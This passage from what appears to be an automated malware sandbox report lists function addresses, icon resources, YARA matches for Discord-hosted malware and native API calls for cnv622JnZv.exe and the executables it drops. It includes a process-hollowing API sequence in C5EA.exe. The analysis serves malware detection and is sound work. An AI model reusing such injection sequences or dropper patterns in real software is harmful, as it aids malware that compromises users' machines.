Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B090 24_2_6B48B090
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5367E2 24_2_6B5367E2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FAE60 24_2_6B4FAE60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B496E30 24_2_6B496E30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B542EF7 24_2_6B542EF7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B541D55 24_2_6B541D55
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492D50 24_2_6B492D50
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B470D20 24_2_6B470D20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A35D0 24_2_6B4A35D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492430 24_2_6B492430
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534496 24_2_6B534496
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00425150 34_2_00425150
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0042419D 34_2_0042419D
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041FAF0 34_2_0041FAF0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00403340 34_2_00403340
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00414437 34_2_00414437
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00422E27 34_2_00422E27
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00422F47 34_2_00422F47
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041FF88 34_2_0041FF88
PE file contains strange resources
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2E26.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.22.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.22.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Uses 32bit PE files
Source: cnv622JnZv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 29.0.A557.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.0.A557.exe.2d0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.2.A557.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.0.A557.exe.2d0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.0.A557.exe.2d0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.2.77DC.exe.a50000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\A557.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\66A4.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\77DC.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: String function: 00410ED0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: String function: 0040FB00 appears 101 times
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: String function: 6B505720 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: String function: 6B47B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: String function: 6B4CD08C appears 41 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040185B Sleep,NtTerminateProcess, 3_2_0040185B
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_00401866 Sleep,NtTerminateProcess, 3_2_00401866
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040187A Sleep,NtTerminateProcess, 3_2_0040187A
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040163B NtMapViewOfSection, 3_2_0040163B
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_004018D3 NtTerminateProcess, 3_2_004018D3
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_00401884 Sleep,NtTerminateProcess, 3_2_00401884
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_00401888 NtTerminateProcess, 3_2_00401888
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040156A NtMapViewOfSection, 3_2_0040156A
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_2_004015DB
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_004017EA Sleep,NtTerminateProcess, 3_2_004017EA
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_1_0040156A NtMapViewOfSection, 3_1_0040156A
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_1_004015DB
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_1_0040163B NtMapViewOfSection, 3_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_02BA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 17_2_02BA0110
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040185B Sleep,NtTerminateProcess, 18_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_00401866 Sleep,NtTerminateProcess, 18_2_00401866
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040187A Sleep,NtTerminateProcess, 18_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040163B NtMapViewOfSection, 18_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_004018D3 NtTerminateProcess, 18_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_00401884 Sleep,NtTerminateProcess, 18_2_00401884
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_00401888 NtTerminateProcess, 18_2_00401888
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040156A NtMapViewOfSection, 18_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 18_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_004017EA Sleep,NtTerminateProcess, 18_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_0040181C Sleep,NtTerminateProcess, 24_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402406 NtEnumerateKey, 24_2_00402406
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00401F25 NtQuerySystemInformation, 24_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00401828 Sleep,NtTerminateProcess, 24_2_00401828
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402431 NtEnumerateKey, 24_2_00402431
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_004017DA Sleep,NtTerminateProcess, 24_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_004017F8 NtTerminateProcess, 24_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_0040209A NtQuerySystemInformation, 24_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_004017A3 Sleep,NtTerminateProcess, 24_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B99A0 ZwCreateSection,LdrInitializeThunk, 24_2_6B4B99A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9860 ZwQuerySystemInformation,LdrInitializeThunk, 24_2_6B4B9860
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9820 ZwEnumerateKey,LdrInitializeThunk, 24_2_6B4B9820
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B98C0 ZwDuplicateObject,LdrInitializeThunk, 24_2_6B4B98C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9780 ZwMapViewOfSection,LdrInitializeThunk, 24_2_6B4B9780
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9660 ZwAllocateVirtualMemory,LdrInitializeThunk, 24_2_6B4B9660
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B967A NtQueryInformationProcess,LdrInitializeThunk, 24_2_6B4B967A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9600 ZwOpenKey,LdrInitializeThunk, 24_2_6B4B9600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B48 ZwClose,ZwClose, 24_2_6B4A3B48
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548B58
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B508372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 24_2_6B508372
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B486B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 24_2_6B486B6B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 24_2_6B4F7365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAB60 ZwReleaseKeyedEvent, 24_2_6B4BAB60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 24_2_6B4A3B7A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 24_2_6B506365
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472B7E ZwSetInformationThread,ZwClose, 24_2_6B472B7E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B526369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 24_2_6B526369
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAB70 ZwReleaseWorkerFactoryWorker, 24_2_6B4BAB70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 24_2_6B474B00
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B53131B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9B00 ZwSetValueKey, 24_2_6B4B9B00
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5306 ZwReleaseKeyedEvent, 24_2_6B4A5306
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479335 ZwClose,ZwClose, 24_2_6B479335
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 24_2_6B472BC2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 24_2_6B48A3E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4723F6 ZwClose,RtlFreeHeap, 24_2_6B4723F6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9BF0 ZwAlertThreadByThreadId, 24_2_6B4B9BF0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 24_2_6B472B93
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 24_2_6B4A939F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B53138A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA390 ZwGetCachedSigningLevel, 24_2_6B4BA390
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548BB6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 24_2_6B4A4BAD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B549BBE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA3A0 ZwGetCompleteWnfStateSubscription, 24_2_6B4BA3A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B531BA8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 24_2_6B479240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 24_2_6B501242
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9A50 ZwCreateFile, 24_2_6B4B9A50
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548A62
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 24_2_6B548214
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9A00 ZwProtectVirtualMemory, 24_2_6B4B9A00
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 24_2_6B49A229
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 24_2_6B474A20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAA20 ZwQuerySecurityAttributesToken, 24_2_6B4BAA20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 24_2_6B504A28
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AB230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 24_2_6B4AB230
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9A30 ZwTerminateThread, 24_2_6B4B9A30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B478239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 24_2_6B478239
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501AD6 ZwFreeVirtualMemory, 24_2_6B501AD6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548ADD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAAC0 ZwQueryWnfStateNameInformation, 24_2_6B4BAAC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 24_2_6B49FAD0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9AE0 ZwTraceEvent, 24_2_6B4B9AE0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAAE0 ZwRaiseException, 24_2_6B4BAAE0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 24_2_6B4ADA88
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 24_2_6B492280
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB280 ZwWow64DebuggerCall, 24_2_6B4BB280
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 24_2_6B47429E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAA90 ZwQuerySystemInformationEx, 24_2_6B4BAA90
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 24_2_6B4AD294
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 24_2_6B4752A5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 24_2_6B471AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose, 24_2_6B47BAA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 24_2_6B4A5AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE2BB ZwWaitForAlertByThreadId, 24_2_6B4AE2BB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9AB0 ZwWaitForMultipleObjects, 24_2_6B4B9AB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 24_2_6B49B944
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 24_2_6B47F150
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 24_2_6B47395E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB150 ZwUnsubscribeWnfStateChange, 24_2_6B4BB150
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501976 ZwCreateEvent, 24_2_6B501976
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB160 ZwUpdateWnfStateData, 24_2_6B4BB160
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA160 ZwCreateWorkerFactory, 24_2_6B4BA160
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548966
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 24_2_6B47B171
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD976 ZwCreateFile,ZwCreateFile, 24_2_6B4AD976
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 24_2_6B480100
